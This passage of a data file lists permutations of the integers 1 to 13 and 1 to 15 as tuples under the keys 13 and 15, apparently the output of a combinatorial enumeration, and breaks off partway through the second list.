13:[(1,7,13,6,12,5,11,4,10,3,9,2,8),(1,8,2,9,3,10,4,11,5,12,6,13,7),(2,8,1,7,13,6,12,5,11,4,10,3,9),(2,8,1,9,3,10,4,11,5,12,6,13,7),(2,9,3,10,4,11,5,12,6,13,7,1,8),(3,9,1,7,13,6,12,5,11,4,10,2,8),(3,9,1,8,2,10,4,11,5,12,6,13,7),(3,9,2,8,1,7,13,6,12,5,11,4,10),(3,9,2,8,1,10,4,11,5,12,6,13,7),(3,9,2,10,4,11,5,12,6,13,7,1,8),(3,10,4,11,5,12,6,13,7,1,8,2,9),(3,10,4,11,5,12,6,13,7,1,9,2,8),(4,10,1,7,13,6,12,5,11,3,9,2,8),(4,10,1,8,2,9,3,11,5,12,6,13,7),(4,10,2,8,1,7,13,6,12,5,11,3,9),(4,10,2,8,1,9,3,11,5,12,6,13,7),(4,10,2,9,3,11,5,12,6,13,7,1,8),(4,10,3,9,1,7,13,6,12,5,11,2,8),(4,10,3,9,1,8,2,11,5,12,6,13,7),(4,10,3,9,2,8,1,7,13,6,12,5,11),(4,10,3,9,2,8,1,11,5,12,6,13,7),(4,10,3,9,2,11,5,12,6,13,7,1,8),(4,10,3,11,5,12,6,13,7,1,8,2,9),(4,10,3,11,5,12,6,13,7,1,9,2,8),(4,11,5,12,6,13,7,1,8,2,9,3,10),(4,11,5,12,6,13,7,1,8,2,10,3,9),(4,11,5,12,6,13,7,1,9,3,10,2,8),(4,11,5,12,6,13,7,1,10,3,9,2,8),(5,11,1,7,13,6,12,4,10,3,9,2,8),(5,11,1,8,2,9,3,10,4,12,6,13,7),(5,11,2,8,1,7,13,6,12,4,10,3,9),(5,11,2,8,1,9,3,10,4,12,6,13,7),(5,11,2,9,3,10,4,12,6,13,7,1,8),(5,11,3,9,1,7,13,6,12,4,10,2,8),(5,11,3,9,1,8,2,10,4,12,6,13,7),(5,11,3,9,2,8,1,7,13,6,12,4,10),(5,11,3,9,2,8,1,10,4,12,6,13,7),(5,11,3,9,2,10,4,12,6,13,7,1,8),(5,11,3,10,4,12,6,13,7,1,8,2,9),(5,11,3,10,4,12,6,13,7,1,9,2,8),(5,11,4,10,1,7,13,6,12,3,9,2,8),(5,11,4,10,1,8,2,9,3,12,6,13,7),(5,11,4,10,2,8,1,7,13,6,12,3,9),(5,11,4,10,2,8,1,9,3,12,6,13,7),(5,11,4,10,2,9,3,12,6,13,7,1,8),(5,11,4,10,3,9,1,7,13,6,12,2,8),(5,11,4,10,3,9,1,8,2,12,6,13,7),(5,11,4,10,3,9,2,8,1,7,13,6,12),(5,11,4,10,3,9,2,8,1,12,6,13,7),(5,11,4,10,3,9,2,12,6,13,7,1,8),(5,11,4,10,3,12,6,13,7,1,8,2,9),(5,11,4,10,3,12,6,13,7,1,9,2,8),(5,11,4,12,6,13,7,1,8,2,9,3,10),(5,11,4,12,6,13,7,1,8,2,10,3,9),(5,11,4,12,6,13,7,1,9,3,10,2,8),(5,11,4,12,6,13,7,1,10,3,9,2,8),(5,12,6,13,7,1,8,2,9,3,10,4,11),(5,12,6,13,7,1,8,2,9,3,11,4,10),(5,12,6,13,7,1,8,2,10,4,11,3,9),(5,12,6,13,7,1,8,2,11,4,10,3,9),(5,12,6,13,7,1,9,3,10,4,11,2,8),(5,12,6,13,7,1,9,3,11,4,10,2,8),(5,12,6,13,7
,1,10,4,11,3,9,2,8),(5,12,6,13,7,1,11,4,10,3,9,2,8),(6,12,1,7,13,5,11,4,10,3,9,2,8),(6,12,1,8,2,9,3,10,4,11,5,13,7),(6,12,2,8,1,7,13,5,11,4,10,3,9),(6,12,2,8,1,9,3,10,4,11,5,13,7),(6,12,2,9,3,10,4,11,5,13,7,1,8),(6,12,3,9,1,7,13,5,11,4,10,2,8),(6,12,3,9,1,8,2,10,4,11,5,13,7),(6,12,3,9,2,8,1,7,13,5,11,4,10),(6,12,3,9,2,8,1,10,4,11,5,13,7),(6,12,3,9,2,10,4,11,5,13,7,1,8),(6,12,3,10,4,11,5,13,7,1,8,2,9),(6,12,3,10,4,11,5,13,7,1,9,2,8),(6,12,4,10,1,7,13,5,11,3,9,2,8),(6,12,4,10,1,8,2,9,3,11,5,13,7),(6,12,4,10,2,8,1,7,13,5,11,3,9),(6,12,4,10,2,8,1,9,3,11,5,13,7),(6,12,4,10,2,9,3,11,5,13,7,1,8),(6,12,4,10,3,9,1,7,13,5,11,2,8),(6,12,4,10,3,9,1,8,2,11,5,13,7),(6,12,4,10,3,9,2,8,1,7,13,5,11),(6,12,4,10,3,9,2,8,1,11,5,13,7),(6,12,4,10,3,9,2,11,5,13,7,1,8),(6,12,4,10,3,11,5,13,7,1,8,2,9),(6,12,4,10,3,11,5,13,7,1,9,2,8),(6,12,4,11,5,13,7,1,8,2,9,3,10),(6,12,4,11,5,13,7,1,8,2,10,3,9),(6,12,4,11,5,13,7,1,9,3,10,2,8),(6,12,4,11,5,13,7,1,10,3,9,2,8),(6,12,5,11,1,7,13,4,10,3,9,2,8),(6,12,5,11,1,8,2,9,3,10,4,13,7),(6,12,5,11,2,8,1,7,13,4,10,3,9),(6,12,5,11,2,8,1,9,3,10,4,13,7),(6,12,5,11,2,9,3,10,4,13,7,1,8),(6,12,5,11,3,9,1,7,13,4,10,2,8),(6,12,5,11,3,9,1,8,2,10,4,13,7),(6,12,5,11,3,9,2,8,1,7,13,4,10),(6,12,5,11,3,9,2,8,1,10,4,13,7),(6,12,5,11,3,9,2,10,4,13,7,1,8),(6,12,5,11,3,10,4,13,7,1,8,2,9),(6,12,5,11,3,10,4,13,7,1,9,2,8),(6,12,5,11,4,10,1,7,13,3,9,2,8),(6,12,5,11,4,10,1,8,2,9,3,13,7),(6,12,5,11,4,10,2,8,1,7,13,3,9),(6,12,5,11,4,10,2,8,1,9,3,13,7),(6,12,5,11,4,10,2,9,3,13,7,1,8),(6,12,5,11,4,10,3,9,1,7,13,2,8),(6,12,5,11,4,10,3,9,1,8,2,13,7),(6,12,5,11,4,10,3,9,2,8,1,7,13),(6,12,5,11,4,10,3,9,2,8,1,13,7),(6,12,5,11,4,10,3,9,2,13,7,1,8),(6,12,5,11,4,10,3,13,7,1,8,2,9),(6,12,5,11,4,10,3,13,7,1,9,2,8),(6,12,5,11,4,13,7,1,8,2,9,3,10),(6,12,5,11,4,13,7,1,8,2,10,3,9),(6,12,5,11,4,13,7,1,9,3,10,2,8),(6,12,5,11,4,13,7,1,10,3,9,2,8),(6,12,5,13,7,1,8,2,9,3,10,4,11),(6,12,5,13,7,1,8,2,9,3,11,4,10),(6,12,5,13,7,1,8,2,10,4,11,3,9),(6,12,5,13,7,1,8,2,11,4,10,3,9),(6,12,5,13,7,1,9,3,10,4,11,2
,8),(6,12,5,13,7,1,9,3,11,4,10,2,8),(6,12,5,13,7,1,10,4,11,3,9,2,8),(6,12,5,13,7,1,11,4,10,3,9,2,8),(6,13,7,1,8,2,9,3,10,4,11,5,12),(6,13,7,1,8,2,9,3,10,4,12,5,11),(6,13,7,1,8,2,9,3,11,5,12,4,10),(6,13,7,1,8,2,9,3,12,5,11,4,10),(6,13,7,1,8,2,10,4,11,5,12,3,9),(6,13,7,1,8,2,10,4,12,5,11,3,9),(6,13,7,1,8,2,11,5,12,4,10,3,9),(6,13,7,1,8,2,12,5,11,4,10,3,9),(6,13,7,1,9,3,10,4,11,5,12,2,8),(6,13,7,1,9,3,10,4,12,5,11,2,8),(6,13,7,1,9,3,11,5,12,4,10,2,8),(6,13,7,1,9,3,12,5,11,4,10,2,8),(6,13,7,1,10,4,11,5,12,3,9,2,8),(6,13,7,1,10,4,12,5,11,3,9,2,8),(6,13,7,1,11,5,12,4,10,3,9,2,8),(6,13,7,1,12,5,11,4,10,3,9,2,8),(7,1,8,2,9,3,10,4,11,5,12,6,13),(7,1,8,2,9,3,10,4,11,5,13,6,12),(7,1,8,2,9,3,10,4,12,6,13,5,11),(7,1,8,2,9,3,10,4,13,6,12,5,11),(7,1,8,2,9,3,11,5,12,6,13,4,10),(7,1,8,2,9,3,11,5,13,6,12,4,10),(7,1,8,2,9,3,12,6,13,5,11,4,10),(7,1,8,2,9,3,13,6,12,5,11,4,10),(7,1,8,2,10,4,11,5,12,6,13,3,9),(7,1,8,2,10,4,11,5,13,6,12,3,9),(7,1,8,2,10,4,12,6,13,5,11,3,9),(7,1,8,2,10,4,13,6,12,5,11,3,9),(7,1,8,2,11,5,12,6,13,4,10,3,9),(7,1,8,2,11,5,13,6,12,4,10,3,9),(7,1,8,2,12,6,13,5,11,4,10,3,9),(7,1,8,2,13,6,12,5,11,4,10,3,9),(7,1,9,3,10,4,11,5,12,6,13,2,8),(7,1,9,3,10,4,11,5,13,6,12,2,8),(7,1,9,3,10,4,12,6,13,5,11,2,8),(7,1,9,3,10,4,13,6,12,5,11,2,8),(7,1,9,3,11,5,12,6,13,4,10,2,8),(7,1,9,3,11,5,13,6,12,4,10,2,8),(7,1,9,3,12,6,13,5,11,4,10,2,8),(7,1,9,3,13,6,12,5,11,4,10,2,8),(7,1,10,4,11,5,12,6,13,3,9,2,8),(7,1,10,4,11,5,13,6,12,3,9,2,8),(7,1,10,4,12,6,13,5,11,3,9,2,8),(7,1,10,4,13,6,12,5,11,3,9,2,8),(7,1,11,5,12,6,13,4,10,3,9,2,8),(7,1,11,5,13,6,12,4,10,3,9,2,8),(7,1,12,6,13,5,11,4,10,3,9,2,8),(7,1,13,6,12,5,11,4,10,3,9,2,8),(7,13,1,8,2,9,3,10,4,11,5,12,6),(7,13,2,8,1,9,3,10,4,11,5,12,6),(7,13,3,9,1,8,2,10,4,11,5,12,6),(7,13,3,9,2,8,1,10,4,11,5,12,6),(7,13,4,10,1,8,2,9,3,11,5,12,6),(7,13,4,10,2,8,1,9,3,11,5,12,6),(7,13,4,10,3,9,1,8,2,11,5,12,6),(7,13,4,10,3,9,2,8,1,11,5,12,6),(7,13,5,11,1,8,2,9,3,10,4,12,6),(7,13,5,11,2,8,1,9,3,10,4,12,6),(7,13,5,11,3,9,1,8,2,10,4,12,6),(7,13,5,11,3
,9,2,8,1,10,4,12,6),(7,13,5,11,4,10,1,8,2,9,3,12,6),(7,13,5,11,4,10,2,8,1,9,3,12,6),(7,13,5,11,4,10,3,9,1,8,2,12,6),(7,13,5,11,4,10,3,9,2,8,1,12,6),(7,13,6,12,1,8,2,9,3,10,4,11,5),(7,13,6,12,2,8,1,9,3,10,4,11,5),(7,13,6,12,3,9,1,8,2,10,4,11,5),(7,13,6,12,3,9,2,8,1,10,4,11,5),(7,13,6,12,4,10,1,8,2,9,3,11,5),(7,13,6,12,4,10,2,8,1,9,3,11,5),(7,13,6,12,4,10,3,9,1,8,2,11,5),(7,13,6,12,4,10,3,9,2,8,1,11,5),(7,13,6,12,5,11,1,8,2,9,3,10,4),(7,13,6,12,5,11,2,8,1,9,3,10,4),(7,13,6,12,5,11,3,9,1,8,2,10,4),(7,13,6,12,5,11,3,9,2,8,1,10,4),(7,13,6,12,5,11,4,10,1,8,2,9,3),(7,13,6,12,5,11,4,10,2,8,1,9,3),(7,13,6,12,5,11,4,10,3,9,1,8,2),(7,13,6,12,5,11,4,10,3,9,2,8,1),(8,1,7,13,2,9,3,10,4,11,5,12,6),(8,1,7,13,3,9,2,10,4,11,5,12,6),(8,1,7,13,4,10,2,9,3,11,5,12,6),(8,1,7,13,4,10,3,9,2,11,5,12,6),(8,1,7,13,5,11,2,9,3,10,4,12,6),(8,1,7,13,5,11,3,9,2,10,4,12,6),(8,1,7,13,5,11,4,10,2,9,3,12,6),(8,1,7,13,5,11,4,10,3,9,2,12,6),(8,1,7,13,6,12,2,9,3,10,4,11,5),(8,1,7,13,6,12,3,9,2,10,4,11,5),(8,1,7,13,6,12,4,10,2,9,3,11,5),(8,1,7,13,6,12,4,10,3,9,2,11,5),(8,1,7,13,6,12,5,11,2,9,3,10,4),(8,1,7,13,6,12,5,11,3,9,2,10,4),(8,1,7,13,6,12,5,11,4,10,2,9,3),(8,1,7,13,6,12,5,11,4,10,3,9,2),(8,2,9,1,7,13,3,10,4,11,5,12,6),(8,2,9,1,7,13,4,10,3,11,5,12,6),(8,2,9,1,7,13,5,11,3,10,4,12,6),(8,2,9,1,7,13,5,11,4,10,3,12,6),(8,2,9,1,7,13,6,12,3,10,4,11,5),(8,2,9,1,7,13,6,12,4,10,3,11,5),(8,2,9,1,7,13,6,12,5,11,3,10,4),(8,2,9,1,7,13,6,12,5,11,4,10,3),(8,2,9,3,10,1,7,13,4,11,5,12,6),(8,2,9,3,10,1,7,13,5,11,4,12,6),(8,2,9,3,10,1,7,13,6,12,4,11,5),(8,2,9,3,10,1,7,13,6,12,5,11,4),(8,2,9,3,10,4,11,1,7,13,5,12,6),(8,2,9,3,10,4,11,1,7,13,6,12,5),(8,2,9,3,10,4,11,5,12,1,7,13,6),(8,2,9,3,10,4,11,5,12,6,13,1,7),(8,2,9,3,10,4,11,5,12,6,13,7,1),(8,2,9,3,10,4,11,5,13,6,12,1,7),(8,2,9,3,10,4,11,5,13,7,1,12,6),(8,2,9,3,10,4,12,5,11,1,7,13,6),(8,2,9,3,10,4,12,6,13,5,11,1,7),(8,2,9,3,10,4,12,6,13,7,1,11,5),(8,2,9,3,10,4,13,6,12,5,11,1,7),(8,2,9,3,10,4,13,7,1,11,5,12,6),(8,2,9,3,11,4,10,1,7,13,5,12,6),(8,2,9,3,11,4,10,1,7,13,6,12
,5),(8,2,9,3,11,5,12,4,10,1,7,13,6),(8,2,9,3,11,5,12,6,13,4,10,1,7),(8,2,9,3,11,5,12,6,13,7,1,10,4),(8,2,9,3,11,5,13,6,12,4,10,1,7),(8,2,9,3,11,5,13,7,1,10,4,12,6),(8,2,9,3,12,5,11,4,10,1,7,13,6),(8,2,9,3,12,6,13,5,11,4,10,1,7),(8,2,9,3,12,6,13,7,1,10,4,11,5),(8,2,9,3,13,6,12,5,11,4,10,1,7),(8,2,9,3,13,7,1,10,4,11,5,12,6),(8,2,10,3,9,1,7,13,4,11,5,12,6),(8,2,10,3,9,1,7,13,5,11,4,12,6),(8,2,10,3,9,1,7,13,6,12,4,11,5),(8,2,10,3,9,1,7,13,6,12,5,11,4),(8,2,10,4,11,3,9,1,7,13,5,12,6),(8,2,10,4,11,3,9,1,7,13,6,12,5),(8,2,10,4,11,5,12,3,9,1,7,13,6),(8,2,10,4,11,5,12,6,13,3,9,1,7),(8,2,10,4,11,5,12,6,13,7,1,9,3),(8,2,10,4,11,5,13,6,12,3,9,1,7),(8,2,10,4,11,5,13,7,1,9,3,12,6),(8,2,10,4,12,5,11,3,9,1,7,13,6),(8,2,10,4,12,6,13,5,11,3,9,1,7),(8,2,10,4,12,6,13,7,1,9,3,11,5),(8,2,10,4,13,6,12,5,11,3,9,1,7),(8,2,10,4,13,7,1,9,3,11,5,12,6),(8,2,11,4,10,3,9,1,7,13,5,12,6),(8,2,11,4,10,3,9,1,7,13,6,12,5),(8,2,11,5,12,4,10,3,9,1,7,13,6),(8,2,11,5,12,6,13,4,10,3,9,1,7),(8,2,11,5,12,6,13,7,1,9,3,10,4),(8,2,11,5,13,6,12,4,10,3,9,1,7),(8,2,11,5,13,7,1,9,3,10,4,12,6),(8,2,12,5,11,4,10,3,9,1,7,13,6),(8,2,12,6,13,5,11,4,10,3,9,1,7),(8,2,12,6,13,7,1,9,3,10,4,11,5),(8,2,13,6,12,5,11,4,10,3,9,1,7),(8,2,13,7,1,9,3,10,4,11,5,12,6),(9,2,8,1,7,13,3,10,4,11,5,12,6),(9,2,8,1,7,13,4,10,3,11,5,12,6),(9,2,8,1,7,13,5,11,3,10,4,12,6),(9,2,8,1,7,13,5,11,4,10,3,12,6),(9,2,8,1,7,13,6,12,3,10,4,11,5),(9,2,8,1,7,13,6,12,4,10,3,11,5),(9,2,8,1,7,13,6,12,5,11,3,10,4),(9,2,8,1,7,13,6,12,5,11,4,10,3),(9,3,10,2,8,1,7,13,4,11,5,12,6),(9,3,10,2,8,1,7,13,5,11,4,12,6),(9,3,10,2,8,1,7,13,6,12,4,11,5),(9,3,10,2,8,1,7,13,6,12,5,11,4),(9,3,10,4,11,2,8,1,7,13,5,12,6),(9,3,10,4,11,2,8,1,7,13,6,12,5),(9,3,10,4,11,5,12,2,8,1,7,13,6),(9,3,10,4,11,5,12,6,13,2,8,1,7),(9,3,10,4,11,5,12,6,13,7,1,8,2),(9,3,10,4,11,5,13,6,12,2,8,1,7),(9,3,10,4,11,5,13,7,1,8,2,12,6),(9,3,10,4,12,5,11,2,8,1,7,13,6),(9,3,10,4,12,6,13,5,11,2,8,1,7),(9,3,10,4,12,6,13,7,1,8,2,11,5),(9,3,10,4,13,6,12,5,11,2,8,1,7),(9,3,10,4,13,7,1,8,2,11,5,12,6),(9,3,11,4,10
,2,8,1,7,13,5,12,6),(9,3,11,4,10,2,8,1,7,13,6,12,5),(9,3,11,5,12,4,10,2,8,1,7,13,6),(9,3,11,5,12,6,13,4,10,2,8,1,7),(9,3,11,5,12,6,13,7,1,8,2,10,4),(9,3,11,5,13,6,12,4,10,2,8,1,7),(9,3,11,5,13,7,1,8,2,10,4,12,6),(9,3,12,5,11,4,10,2,8,1,7,13,6),(9,3,12,6,13,5,11,4,10,2,8,1,7),(9,3,12,6,13,7,1,8,2,10,4,11,5),(9,3,13,6,12,5,11,4,10,2,8,1,7),(9,3,13,7,1,8,2,10,4,11,5,12,6),(10,3,9,2,8,1,7,13,4,11,5,12,6),(10,3,9,2,8,1,7,13,5,11,4,12,6),(10,3,9,2,8,1,7,13,6,12,4,11,5),(10,3,9,2,8,1,7,13,6,12,5,11,4),(10,4,11,3,9,2,8,1,7,13,5,12,6),(10,4,11,3,9,2,8,1,7,13,6,12,5),(10,4,11,5,12,3,9,2,8,1,7,13,6),(10,4,11,5,12,6,13,3,9,2,8,1,7),(10,4,11,5,12,6,13,7,1,8,2,9,3),(10,4,11,5,13,6,12,3,9,2,8,1,7),(10,4,11,5,13,7,1,8,2,9,3,12,6),(10,4,12,5,11,3,9,2,8,1,7,13,6),(10,4,12,6,13,5,11,3,9,2,8,1,7),(10,4,12,6,13,7,1,8,2,9,3,11,5),(10,4,13,6,12,5,11,3,9,2,8,1,7),(10,4,13,7,1,8,2,9,3,11,5,12,6),(11,4,10,3,9,2,8,1,7,13,5,12,6),(11,4,10,3,9,2,8,1,7,13,6,12,5),(11,5,12,4,10,3,9,2,8,1,7,13,6),(11,5,12,6,13,4,10,3,9,2,8,1,7),(11,5,12,6,13,7,1,8,2,9,3,10,4),(11,5,13,6,12,4,10,3,9,2,8,1,7),(11,5,13,7,1,8,2,9,3,10,4,12,6),(12,5,11,4,10,3,9,2,8,1,7,13,6),(12,6,13,5,11,4,10,3,9,2,8,1,7),(12,6,13,7,1,8,2,9,3,10,4,11,5),(13,6,12,5,11,4,10,3,9,2,8,1,7),(13,7,1,8,2,9,3,10,4,11,5,12,6)],
15:[(1,8,15,7,14,6,13,5,12,4,11,3,10,2,9),(1,9,2,10,3,11,4,12,5,13,6,14,7,15,8),(2,9,1,8,15,7,14,6,13,5,12,4,11,3,10),(2,9,1,10,3,11,4,12,5,13,6,14,7,15,8),(2,10,3,11,4,12,5,13,6,14,7,15,8,1,9),(3,10,1,8,15,7,14,6,13,5,12,4,11,2,9),(3,10,1,9,2,11,4,12,5,13,6,14,7,15,8),(3,10,2,9,1,8,15,7,14,6,13,5,12,4,11),(3,10,2,9,1,11,4,12,5,13,6,14,7,15,8),(3,10,2,11,4,12,5,13,6,14,7,15,8,1,9),(3,11,4,12,5,13,6,14,7,15,8,1,9,2,10),(3,11,4,12,5,13,6,14,7,15,8,1,10,2,9),(4,11,1,8,15,7,14,6,13,5,12,3,10,2,9),(4,11,1,9,2,10,3,12,5,13,6,14,7,15,8),(4,11,2,9,1,8,15,7,14,6,13,5,12,3,10),(4,11,2,9,1,10,3,12,5,13,6,14,7,15,8),(4,11,2,10,3,12,5,13,6,14,7,15,8,1,9),(4,11,3,10,1,8,15,7,14,6,13,5,12,2,9),(4,11,3,10,1,9,2,12,5,13,6,14,7,15,8),(4,11,3,10,2,9,1,8,15,7,14,6,13,5,12),(4,11,3,10,2,9,1,12,5,13,6,14,7,15,8),(4,11,3,10,2,12,5,13,6,14,7,15,8,1,9),(4,11,3,12,5,13,6,14,7,15,8,1,9,2,10),(4,11,3,12,5,13,6,14,7,15,8,1,10,2,9),(4,12,5,13,6,14,7,15,8,1,9,2,10,3,11),(4,12,5,13,6,14,7,15,8,1,9,2,11,3,10),(4,12,5,13,6,14,7,15,8,1,10,3,11,2,9),(4,12,5,13,6,14,7,15,8,1,11,3,10,2,9),(5,12,1,8,15,7,14,6,13,4,11,3,10,2,9),(5,12,1,9,2,10,3,11,4,13,6,14,7,15,8),(5,12,2,9,1,8,15,7,14,6,13,4,11,3,10),(5,12,2,9,1,10,3,11,4,13,6,14,7,15,8),(5,12,2,10,3,11,4,13,6,14,7,15,8,1,9),(5,12,3,10,1,8,15,7,14,6,13,4,11,2,9),(5,12,3,10,1,9,2,11,4,13,6,14,7,15,8),(5,12,3,10,2,9,1,8,15,7,14,6,13,4,11),(5,12,3,10,2,9,1,11,4,13,6,14,7,15,8),(5,12,3,10,2,11,4,13,6,14,7,15,8,1,9),(5,12,3,11,4,13,6,14,7,15,8,1,9,2,10),(5,12,3,11,4,13,6,14,7,15,8,1,10,2,9),(5,12,4,11,1,8,15,7,14,6,13,3,10,2,9),(5,12,4,11,1,9,2,10,3,13,6,14,7,15,8),(5,12,4,11,2,9,1,8,15,7,14,6,13,3,10),(5,12,4,11,2,9,1,10,3,13,6,14,7,15,8),(5,12,4,11,2,10,3,13,6,14,7,15,8,1,9),(5,12,4,11,3,10,1,8,15,7,14,6,13,2,9),(5,12,4,11,3,10,1,9,2,13,6,14,7,15,8),(5,12,4,11,3,10,2,9,1,8,15,7,14,6,13),(5,12,4,11,3,10,2,9,1,13,6,14,7,15,8),(5,12,4,11,3,10,2,13,6,14,7,15,8,1,9),(5,12,4,11,3,13,6,14,7,15,8,1,9,2,10),(5,12,4,11,3,13,6,14,7,15,8,1,10,2,9),(5,12,4,13,6,14,7,15
,8,1,9,2,10,3,11),(5,12,4,13,6,14,7,15,8,1,9,2,11,3,10),(5,12,4,13,6,14,7,15,8,1,10,3,11,2,9),(5,12,4,13,6,14,7,15,8,1,11,3,10,2,9),(5,13,6,14,7,15,8,1,9,2,10,3,11,4,12),(5,13,6,14,7,15,8,1,9,2,10,3,12,4,11),(5,13,6,14,7,15,8,1,9,2,11,4,12,3,10),(5,13,6,14,7,15,8,1,9,2,12,4,11,3,10),(5,13,6,14,7,15,8,1,10,3,11,4,12,2,9),(5,13,6,14,7,15,8,1,10,3,12,4,11,2,9),(5,13,6,14,7,15,8,1,11,4,12,3,10,2,9),(5,13,6,14,7,15,8,1,12,4,11,3,10,2,9),(6,13,1,8,15,7,14,5,12,4,11,3,10,2,9),(6,13,1,9,2,10,3,11,4,12,5,14,7,15,8),(6,13,2,9,1,8,15,7,14,5,12,4,11,3,10),(6,13,2,9,1,10,3,11,4,12,5,14,7,15,8),(6,13,2,10,3,11,4,12,5,14,7,15,8,1,9),(6,13,3,10,1,8,15,7,14,5,12,4,11,2,9),(6,13,3,10,1,9,2,11,4,12,5,14,7,15,8),(6,13,3,10,2,9,1,8,15,7,14,5,12,4,11),(6,13,3,10,2,9,1,11,4,12,5,14,7,15,8),(6,13,3,10,2,11,4,12,5,14,7,15,8,1,9),(6,13,3,11,4,12,5,14,7,15,8,1,9,2,10),(6,13,3,11,4,12,5,14,7,15,8,1,10,2,9),(6,13,4,11,1,8,15,7,14,5,12,3,10,2,9),(6,13,4,11,1,9,2,10,3,12,5,14,7,15,8),(6,13,4,11,2,9,1,8,15,7,14,5,12,3,10),(6,13,4,11,2,9,1,10,3,12,5,14,7,15,8),(6,13,4,11,2,10,3,12,5,14,7,15,8,1,9),(6,13,4,11,3,10,1,8,15,7,14,5,12,2,9),(6,13,4,11,3,10,1,9,2,12,5,14,7,15,8),(6,13,4,11,3,10,2,9,1,8,15,7,14,5,12),(6,13,4,11,3,10,2,9,1,12,5,14,7,15,8),(6,13,4,11,3,10,2,12,5,14,7,15,8,1,9),(6,13,4,11,3,12,5,14,7,15,8,1,9,2,10),(6,13,4,11,3,12,5,14,7,15,8,1,10,2,9),(6,13,4,12,5,14,7,15,8,1,9,2,10,3,11),(6,13,4,12,5,14,7,15,8,1,9,2,11,3,10),(6,13,4,12,5,14,7,15,8,1,10,3,11,2,9),(6,13,4,12,5,14,7,15,8,1,11,3,10,2,9),(6,13,5,12,1,8,15,7,14,4,11,3,10,2,9),(6,13,5,12,1,9,2,10,3,11,4,14,7,15,8),(6,13,5,12,2,9,1,8,15,7,14,4,11,3,10),(6,13,5,12,2,9,1,10,3,11,4,14,7,15,8),(6,13,5,12,2,10,3,11,4,14,7,15,8,1,9),(6,13,5,12,3,10,1,8,15,7,14,4,11,2,9),(6,13,5,12,3,10,1,9,2,11,4,14,7,15,8),(6,13,5,12,3,10,2,9,1,8,15,7,14,4,11),(6,13,5,12,3,10,2,9,1,11,4,14,7,15,8),(6,13,5,12,3,10,2,11,4,14,7,15,8,1,9),(6,13,5,12,3,11,4,14,7,15,8,1,9,2,10),(6,13,5,12,3,11,4,14,7,15,8,1,10,2,9),(6,13,5,12,4,11,1,8,15,7,14,3,10,2,9),(6,13,
5,12,4,11,1,9,2,10,3,14,7,15,8),(6,13,5,12,4,11,2,9,1,8,15,7,14,3,10),(6,13,5,12,4,11,2,9,1,10,3,14,7,15,8),(6,13,5,12,4,11,2,10,3,14,7,15,8,1,9),(6,13,5,12,4,11,3,10,1,8,15,7,14,2,9),(6,13,5,12,4,11,3,10,1,9,2,14,7,15,8),(6,13,5,12,4,11,3,10,2,9,1,8,15,7,14),(6,13,5,12,4,11,3,10,2,9,1,14,7,15,8),(6,13,5,12,4,11,3,10,2,14,7,15,8,1,9),(6,13,5,12,4,11,3,14,7,15,8,1,9,2,10),(6,13,5,12,4,11,3,14,7,15,8,1,10,2,9),(6,13,5,12,4,14,7,15,8,1,9,2,10,3,11),(6,13,5,12,4,14,7,15,8,1,9,2,11,3,10),(6,13,5,12,4,14,7,15,8,1,10,3,11,2,9),(6,13,5,12,4,14,7,15,8,1,11,3,10,2,9),(6,13,5,14,7,15,8,1,9,2,10,3,11,4,12),(6,13,5,14,7,15,8,1,9,2,10,3,12,4,11),(6,13,5,14,7,15,8,1,9,2,11,4,12,3,10),(6,13,5,14,7,15,8,1,9,2,12,4,11,3,10),(6,13,5,14,7,15,8,1,10,3,11,4,12,2,9),(6,13,5,14,7,15,8,1,10,3,12,4,11,2,9),(6,13,5,14,7,15,8,1,11,4,12,3,10,2,9),(6,13,5,14,7,15,8,1,12,4,11,3,10,2,9),(6,14,7,15,8,1,9,2,10,3,11,4,12,5,13),(6,14,7,15,8,1,9,2,10,3,11,4,13,5,12),(6,14,7,15,8,1,9,2,10,3,12,5,13,4,11),(6,14,7,15,8,1,9,2,10,3,13,5,12,4,11),(6,14,7,15,8,1,9,2,11,4,12,5,13,3,10),(6,14,7,15,8,1,9,2,11,4,13,5,12,3,10),(6,14,7,15,8,1,9,2,12,5,13,4,11,3,10),(6,14,7,15,8,1,9,2,13,5,12,4,11,3,10),(6,14,7,15,8,1,10,3,11,4,12,5,13,2,9),(6,14,7,15,8,1,10,3,11,4,13,5,12,2,9),(6,14,7,15,8,1,10,3,12,5,13,4,11,2,9),(6,14,7,15,8,1,10,3,13,5,12,4,11,2,9),(6,14,7,15,8,1,11,4,12,5,13,3,10,2,9),(6,14,7,15,8,1,11,4,13,5,12,3,10,2,9),(6,14,7,15,8,1,12,5,13,4,11,3,10,2,9),(6,14,7,15,8,1,13,5,12,4,11,3,10,2,9),(7,14,1,8,15,6,13,5,12,4,11,3,10,2,9),(7,14,1,9,2,10,3,11,4,12,5,13,6,15,8),(7,14,2,9,1,8,15,6,13,5,12,4,11,3,10),(7,14,2,9,1,10,3,11,4,12,5,13,6,15,8),(7,14,2,10,3,11,4,12,5,13,6,15,8,1,9),(7,14,3,10,1,8,15,6,13,5,12,4,11,2,9),(7,14,3,10,1,9,2,11,4,12,5,13,6,15,8),(7,14,3,10,2,9,1,8,15,6,13,5,12,4,11),(7,14,3,10,2,9,1,11,4,12,5,13,6,15,8),(7,14,3,10,2,11,4,12,5,13,6,15,8,1,9),(7,14,3,11,4,12,5,13,6,15,8,1,9,2,10),(7,14,3,11,4,12,5,13,6,15,8,1,10,2,9),(7,14,4,11,1,8,15,6,13,5,12,3,10,2,9),(7,14,4,11,1,9,2,10,3,12,5,13,
6,15,8),(7,14,4,11,2,9,1,8,15,6,13,5,12,3,10),(7,14,4,11,2,9,1,10,3,12,5,13,6,15,8),(7,14,4,11,2,10,3,12,5,13,6,15,8,1,9),(7,14,4,11,3,10,1,8,15,6,13,5,12,2,9),(7,14,4,11,3,10,1,9,2,12,5,13,6,15,8),(7,14,4,11,3,10,2,9,1,8,15,6,13,5,12),(7,14,4,11,3,10,2,9,1,12,5,13,6,15,8),(7,14,4,11,3,10,2,12,5,13,6,15,8,1,9),(7,14,4,11,3,12,5,13,6,15,8,1,9,2,10),(7,14,4,11,3,12,5,13,6,15,8,1,10,2,9),(7,14,4,12,5,13,6,15,8,1,9,2,10,3,11),(7,14,4,12,5,13,6,15,8,1,9,2,11,3,10),(7,14,4,12,5,13,6,15,8,1,10,3,11,2,9),(7,14,4,12,5,13,6,15,8,1,11,3,10,2,9),(7,14,5,12,1,8,15,6,13,4,11,3,10,2,9),(7,14,5,12,1,9,2,10,3,11,4,13,6,15,8),(7,14,5,12,2,9,1,8,15,6,13,4,11,3,10),(7,14,5,12,2,9,1,10,3,11,4,13,6,15,8),(7,14,5,12,2,10,3,11,4,13,6,1